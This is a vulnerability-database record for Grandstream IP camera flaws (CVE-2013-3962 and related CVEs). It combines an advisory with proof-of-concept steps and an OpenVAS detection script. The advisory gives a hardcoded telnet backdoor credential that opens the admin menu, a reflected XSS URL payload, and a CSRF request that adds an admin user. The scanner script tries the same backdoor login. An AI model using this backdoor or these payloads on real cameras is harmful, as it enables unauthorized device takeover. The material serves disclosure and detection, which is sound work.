ID CVE-2013-3962 Type cve Reporter cve@mitre.org Modified 2013-10-02T17:28:00
Description
Cross-site scripting (XSS) vulnerability in Grandstream GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, GXV3500, and possibly other camera models before firmware 1.0.4.44, allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
{"packetstorm": [{"lastseen": "2016-12-05T22:18:16", "description": "", "published": "2013-06-13T00:00:00", "type": "packetstorm", "title": "Grandstream Backdoor / Cross Site Request Forgery / Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3962", "CVE-2013-3963", "CVE-2013-3542"], "modified": "2013-06-13T00:00:00", "id": "PACKETSTORM:122004", "href": "https://packetstormsecurity.com/files/122004/Grandstream-Backdoor-Cross-Site-Request-Forgery-Cross-Site-Scripting.html", "sourceData": "`=============================================================================== \nGRANDSTREAM \n==================================================================== \n=============================================================================== \n \n1.Advisory Information \nTitle: Grandstream Series Vulnerabilities \nDate Published: 12/06/2013 \nDate of last updated: 12/06/2013 \n \n2.Vulnerability Description \nThe following vulnerability has been found in these devices: \n-CVE-2013-3542. Backdoor in Telnet Protocol(CAPEC-443) \n-CVE-2013-3962. Cross Site Scripting(CWE-79) \n-CVE-2013-3963. Cross Site Request Forgery(CWE-352) and Clickjacking(Capec-103) \n \n3.Affected Products \nThe following product are affected: GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD and GXV3500. \n-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963. \nIt\u0092s possible others models are affected but they were not checked. \n \n4.PoC \n4.1.Backdoor in Telnet Protocol \nCVE-2013-3542, Backdoor in Telnet Protocol \nYou should connect via telnet protocol to any camera affected (it's open by default). \nAfter all you should be introduce the magic string \u0093 !#/ \u0094 as Username and as Password. \nYou will get the admin panel setting menu. If you type \"help\", the following commands are shown: \n======================================================= \nhelp, quit, status, restart, restore, upgrade, tty_test \n======================================================= \n@@@ restore (Reset settings to factory default) \n \nThe attacker can take the device control, so it's make this devices very vulnerables. \n \n4.2.Cross Site Scripting (XSS) \nCVE-2013-3962, Cross Site Scripting non-persistent. \n_____________________________________________________________________________ \nhttp://xx.xx.xx.xx/<script>alert(123)</script> \n_____________________________________________________________________________ \n \n4.3.Cross Site Request Forgery (CSRF) \nCVE-2013-3963, CSRF via GET method. \nThese cameras use a web interface which is prone to CSRF vulnerabilities. \nA malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. \nYou should introduce the following URL to replicate the attack. \n_____________________________________________________________________________ \nhttp://xx.xx.xx.xx/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0 \n_____________________________________________________________________________ \n \n5.Credits \n-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963 were discovered by Jon\u00e1s Ropero Castillo. \n \n6.Report Timeline \n-2013-05-31: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3542. \n-2013-05-31: Grandstream team reports to the technical support to analyze the vulnerability. \n-2013-06-11: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3962 and CVE-2013-3963 vulnerabilities. \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/122004/grandstream-backdoorxssxsrf.txt"}], "openvas": [{"lastseen": "2020-03-24T19:05:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-3962", "CVE-2013-3963", "CVE-2013-3542"], "description": "The remote Grandstream device has the default telnet user and password ", "modified": "2020-03-24T00:00:00", "published": "2013-06-11T00:00:00", "id": "OPENVAS:1361412562310103737", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103737", "type": "openvas", "title": "Grandstream Devices Backdoor in Telnet Protocol", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Grandstream Devices Backdoor in Telnet Protocol\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103737\");\n script_version(\"2020-03-24T06:41:42+0000\");\n script_cve_id(\"CVE-2013-3542\", \"CVE-2013-3962\", \"CVE-2013-3963\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_name(\"Grandstream Devices Backdoor in Telnet Protocol\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2013/Jun/84\");\n\n script_tag(name:\"last_modification\", value:\"2020-03-24 06:41:42 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-06-11 14:29:08 +0200 (Tue, 11 Jun 2013)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Default Accounts\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"telnetserver_detect_type_nd_version.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the\n disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to\n upgrade to a newer release, disable respective features, remove the product or replace the product by\n another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"summary\", value:\"The remote Grandstream device has the default telnet user and password '!#/'.\");\n exit(0);\n}\n\nif(get_kb_item(\"default_credentials/disable_default_account_checks\"))\n exit(0);\n\ninclude(\"telnet_func.inc\");\ninclude(\"misc_func.inc\");\n\nport = telnet_get_port( default:23 );\n\nsoc = open_sock_tcp(port);\nif(!soc)\n exit(0);\n\nbuf = recv(socket:soc, length:512);\n\nif(\"grandstream\" >!< buf || \"Username\" >!< buf)\n exit(0);\n\nup = '!#/';\n\nsend(socket:soc, data:up + '\\r\\n');\nret = recv(socket:soc, length:512);\n\nif(\"Password\" >!< ret)\n exit(0);\n\nsend(socket:soc, data:up + '\\r\\n');\nret = recv(socket:soc, length:512);\n\nclose(soc);\n\nif(\"Grandstream>\" >< ret) {\n security_message(port:port);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
